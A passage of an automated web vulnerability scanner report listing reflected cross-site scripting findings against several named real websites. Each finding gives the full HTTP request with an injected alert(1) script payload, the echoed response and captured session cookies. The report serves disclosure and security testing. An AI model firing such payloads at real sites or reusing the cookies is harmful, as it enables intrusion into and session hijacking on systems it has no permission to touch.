POST /FusionVM/DesktopDefault.aspx HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
Origin: https://www.fusionvm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQQASDQQ=MNOLHEFCGKBHGOHLANCBPEKB; CriticalWatch_WinMgmt=1ea476ea-f298-43b7-b986-76b4c2ad1a2b; ASP.NET_SessionId=ldofgy3miecclj01ixxgal4x; __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; __utmc=61526075; __utmb=61526075.1.10.1303736107
Content-Length: 5126

_IG_CSS_LINKS_=&ctl01xDesktopThreePanes1xThreePanesxctl05xAdvisoriesGrid=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$password=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$
...[SNIP]...
0alhcvIV7k7bu3g37AjmVa5J8yQOnBJBS8b%2Btlnypc31JyCiXOrCIh%2Fwf2BKBjw%3D%3D&__EVENTARGUMENT=&__EVENTTARGET=&_IG_CALLBACK=ctl01%24Banner%24UserSessionTimer1%24WebAsyncRefreshPanel1%23_0.084691817406564955a188<script>alert(1)</script>e5eb79051f

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Mon, 25 Apr 2011 12:57:37 GMT
Content-Length: 5375

/FusionVM/Images/FooterBackground2.gif/FusionVM/Images/CW-Logo-NoTag-Rev-MinSize.gif20112011.3.0.27<&>0ctl01$Banner$UserSessionTimer1$WebAsyncRefreshPanel1<&>0_0.084691817406564955a188<script>alert(1)</script>e5eb79051f<&>
...[SNIP]...

5.40. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [__EVENTVALIDATION parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.fusionvm.com
Path:	/FusionVM/DesktopDefault.aspx

Issue detail

The value of the __EVENTVALIDATION request parameter is copied into the HTML document as plain text between tags. The payload 2417a<script>alert(1)</script>718a25325a7 was submitted in the __EVENTVALIDATION parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /FusionVM/DesktopDefault.aspx HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
Origin: https://www.fusionvm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQQASDQQ=MNOLHEFCGKBHGOHLANCBPEKB; CriticalWatch_WinMgmt=1ea476ea-f298-43b7-b986-76b4c2ad1a2b; ASP.NET_SessionId=ldofgy3miecclj01ixxgal4x; __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; __utmc=61526075; __utmb=61526075.1.10.1303736107
Content-Length: 5126

_IG_CSS_LINKS_=&ctl01xDesktopThreePanes1xThreePanesxctl05xAdvisoriesGrid=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$password=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$email=&__EVENTVALIDATION=%2FwEWBgKu2sn5AwLrz4T3CALMifq8DQLys6fMBwLn8K3zAwLxjbWVD6Xmq0l0NMQsglcvAmN0lT8Jos9NDGM8PnY%2Fy9C8ZIzR2417a<script>alert(1)</script>718a25325a7&__VIEWSTATE=1eNrdW81vG8cVFylRlkLHdGObTeOAmihObMX82CW5%2FFCsJJRkR4otRxUpOUgguMOdITnWcpfdnRXFHoqeeuyhKFK0hxZJPw5F0X%2BhQK9tcuihQE9tXfTj1KbfBXpI3%2BwuRVKSLVOioTAUwFnOvjf73vv95s3X6mNfKBQIxmRFTqdz8JcMhf2R
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Mon, 25 Apr 2011 12:56:31 GMT
Content-Length: 1716

<&>0ctl01$Banner$UserSessionTimer1$WebAsyncRefreshPanel1<&>0<error><&>0System.Web.HttpException (0x80004005): The state information is invalid for this page and might be corrupted. ---> System.Web.UI.
...[SNIP]...
ows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
ViewState: /wEWBgKu2sn5AwLrz4T3CALMifq8DQLys6fMBwLn8K3zAwLxjbWVD6Xmq0l0NMQsglcvAmN0lT8Jos9NDGM8PnY/y9C8ZIzR2417a<script>alert(1)</script>718a25325a7 --->
...[SNIP]...

5.41. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.fusionvm.com
Path:	/FusionVM/DesktopDefault.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad15c"-alert(1)-"7bb0c543e64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FusionVM/DesktopDefault.aspx?ad15c"-alert(1)-"7bb0c543e64=1 HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQQASDQQ=MNOLHEFCGKBHGOHLANCBPEKB; CriticalWatch_WinMgmt=1ea476ea-f298-43b7-b986-76b4c2ad1a2b; ASP.NET_SessionId=ldofgy3miecclj01ixxgal4x

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Mon, 25 Apr 2011 12:56:49 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Mon, 25 Apr 2011 12:56:48 GMT
Content-Length: 33904

<html>
<head id="htmlHead">
</head>
<body onload="sClock();">
<form method="post" action="DesktopDefault.aspx?ad15c%22-alert(1)-%227bb0c543e64=1" id="ctl00">
<div class="aspNetHidden">
<input
...[SNIP]...
<script language="javascript">Session_Init("/FusionVM/DesktopDefault.aspx?ad15c"-alert(1)-"7bb0c543e64=1", "/FusionVM/go/www.fusionvm/0/en-US/username=/Default.aspx");</script>
...[SNIP]...

5.42. http://www.google.com/search [tch parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.google.com
Path:	/search

Issue detail

The value of the tch request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload dbae5(a)c4e69dbcb8a was submitted in the tch parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /search?sclient=psy&hl=en&source=hp&q=learn.shavlik.com%2Fshavlik%2Findex.cfm%3Fm%3D1112%26pg%3D697&aq=f&aqi=&aql=&oq=&pbx=1&bav=on.2,or.r_gc.r_pw.&fp=76258fd74ceb8990&tch=1dbae5(a)c4e69dbcb8a&ech=1&psi=QW21TdK5G9PngQf2xuWSBA13037356298833 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: rU20-FBA
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=G6tAQMMliMdgbUozp0g-12zJ4nIr9W3lVB7VLX4tvICbyeI1deRYnF0ETnjMaFRcDOw858z9ldTQARgCwUuLQTXPs03YWNQDMeYsf58qFzWq4-g9gJ1mhwHeRmKdbRzf

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:47:44 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 25014

f94-wCe9....S....o....Q...v....l.K<!doctype html><title>learn.shavlik.com/shavlik/index.cfm?m=1112&pg=697. F..\(function(){var jesr_base_page_version=8;var jesr_user_state='c9c918f0';var jesr_sign
...[SNIP]...
index.cfm%3Fm%3D1112%26pg%3D697\\x26amp;aq\\x3df\\x26amp;aqi\\x3d\\x26amp;aql\\x3d\\x26amp;oq\\x3d\\x26amp;pbx\\x3d1\\x26amp;bav\\x3don.2,or.r_gc.r_pw.\\x26amp;fp\\x3d76258fd74ceb8990\\x26amp;tch\\x3d1dbae5(a)c4e69dbcb8a\\x26amp;ech\\x3d1\\x26amp;psi\\x3dQW21TdK5G9PngQf2xuWSBA13037356298833\x27)});});r();var l\x3dSN...Q\x27#\x27)):\x27#\x27;if(l\x3d\x3d\x27#\x27\x26\x26google.defre){google.defre\x3dc,~.*\x26\x26google
...[SNIP]...

5.43. http://www.stillsecure.com/m/ [comments parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stillsecure.com
Path:	/m/

Issue detail

The value of the comments request parameter is copied into the HTML document as plain text between tags. The payload b9f53<script>alert(1)</script>165bb6e429d was submitted in the comments parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=contact-us
Cache-Control: max-age=0
Origin: http://www.stillsecure.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.9.10.1303732858
Content-Length: 168

firstName=&lastName=&company=&email=&phone=&stateProvince=Not+Applicable&comments=b9f53<script>alert(1)</script>165bb6e429d&contact=1&refUrl=&rfId=&leadSource=Contact+Form&campaignName=Contact+Us&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:59 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17182

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<textarea name="comments">b9f53<script>alert(1)</script>165bb6e429d</textarea>
...[SNIP]...

5.44. http://www.stillsecure.com/m/ [company parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stillsecure.com
Path:	/m/

Issue detail

The value of the company request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2efe4"><script>alert(1)</script>2a9cfb0f5d8 was submitted in the company parameter. This input was echoed as 2efe4\"><script>alert(1)</script>2a9cfb0f5d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=contact-us
Cache-Control: max-age=0
Origin: http://www.stillsecure.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.9.10.1303732858
Content-Length: 168

firstName=&lastName=&company=2efe4"><script>alert(1)</script>2a9cfb0f5d8&email=&phone=&stateProvince=Not+Applicable&comments=&contact=1&refUrl=&rfId=&leadSource=Contact+Form&campaignName=Contact+Us&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:45 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17185

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<input name="company" type="text" value="2efe4\"><script>alert(1)</script>2a9cfb0f5d8">
...[SNIP]...

5.45. http://www.stillsecure.com/m/ [email parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stillsecure.com
Path:	/m/

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f5b7"><script>alert(1)</script>eaa16a5bb36 was submitted in the email parameter. This input was echoed as 1f5b7\"><script>alert(1)</script>eaa16a5bb36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=contact-us
Cache-Control: max-age=0
Origin: http://www.stillsecure.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.9.10.1303732858
Content-Length: 168

firstName=&lastName=&company=&email=1f5b7"><script>alert(1)</script>eaa16a5bb36&phone=&stateProvince=Not+Applicable&comments=&contact=1&refUrl=&rfId=&leadSource=Contact+Form&campaignName=Contact+Us&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:48 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17196

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<input name="email" type="text" value="1f5b7\"><script>alert(1)</script>eaa16a5bb36">
...[SNIP]...

5.46. http://www.stillsecure.com/m/ [firstName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stillsecure.com
Path:	/m/

Issue detail

The value of the firstName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54249"><script>alert(1)</script>bb0ca4d9c50 was submitted in the firstName parameter. This input was echoed as 54249\"><script>alert(1)</script>bb0ca4d9c50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=contact-us
Cache-Control: max-age=0
Origin: http://www.stillsecure.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.9.10.1303732858
Content-Length: 168

firstName=54249"><script>alert(1)</script>bb0ca4d9c50&lastName=&company=&email=&phone=&stateProvince=Not+Applicable&comments=&contact=1&refUrl=&rfId=&leadSource=Contact+Form&campaignName=Contact+Us&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:38 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17190

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<input name="firstName" type="text" value="54249\"><script>alert(1)</script>bb0ca4d9c50">
...[SNIP]...

5.47. http://www.stillsecure.com/m/ [lastName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stillsecure.com
Path:	/m/

Issue detail

The value of the lastName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb23d"><script>alert(1)</script>9630ad29cfd was submitted in the lastName parameter. This input was echoed as eb23d\"><script>alert(1)</script>9630ad29cfd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=contact-us
Cache-Control: max-age=0
Origin: http://www.stillsecure.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.9.10.1303732858
Content-Length: 168

firstName=&lastName=eb23d"><script>alert(1)</script>9630ad29cfd&company=&email=&phone=&stateProvince=Not+Applicable&comments=&contact=1&refUrl=&rfId=&leadSource=Contact+Form&campaignName=Contact+Us&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:42 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17178

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<input name="lastName" type="text" value="eb23d\"><script>alert(1)</script>9630ad29cfd">
...[SNIP]...

5.48. http://www.stillsecure.com/m/ [phone parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stillsecure.com
Path:	/m/

Issue detail

The value of the phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffb4b"><script>alert(1)</script>380c8aa2910 was submitted in the phone parameter. This input was echoed as ffb4b\"><script>alert(1)</script>380c8aa2910 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=contact-us
Cache-Control: max-age=0
Origin: http://www.stillsecure.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.9.10.1303732858
Content-Length: 168

firstName=&lastName=&company=&email=&phone=ffb4b"><script>alert(1)</script>380c8aa2910&stateProvince=Not+Applicable&comments=&contact=1&refUrl=&rfId=&leadSource=Contact+Form&campaignName=Contact+Us&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:52 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17138

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<input name="phone" type="text" value="ffb4b\"><script>alert(1)</script>380c8aa2910">
...[SNIP]...

5.49. https://hourly.deploy.com/hmc/report/Netsparkercdbd6412ae00461e9f79a262b2aa7b0f.cfm [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/Netsparkercdbd6412ae00461e9f79a262b2aa7b0f.cfm

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload c6f43<script>alert(1)</script>9d16581bbf9 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /hmc/report/Netsparkercdbd6412ae00461e9f79a262b2aa7b0f.cfm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)c6f43<script>alert(1)</script>9d16581bbf9
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Mon, 25 Apr 2011 13:41:34 GMT
Server: Apache/2.0.46 (Red Hat)
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:34 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

</TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)c6f43<script>alert(1)</script>9d16581bbf9</td>
...[SNIP]...

5.50. http://www.eset.com/business/server-security/linux-file [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.eset.com
Path:	/business/server-security/linux-file

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 619e4"-alert(1)-"482a8458b9e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /business/server-security/linux-file HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=619e4"-alert(1)-"482a8458b9e
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.1.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738137976%3B%20gpv_pageName%3Dus/business/products%7C1303738137981%3B%20s_nr%3D1303736337984-Repeat%7C1335272337984%3B%20s_invisit%3Dtrue%7C1303738137988%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B

Response (redirected)

5.51. http://www.eset.com/us [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4087"-alert(1)-"8cebc1897b2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

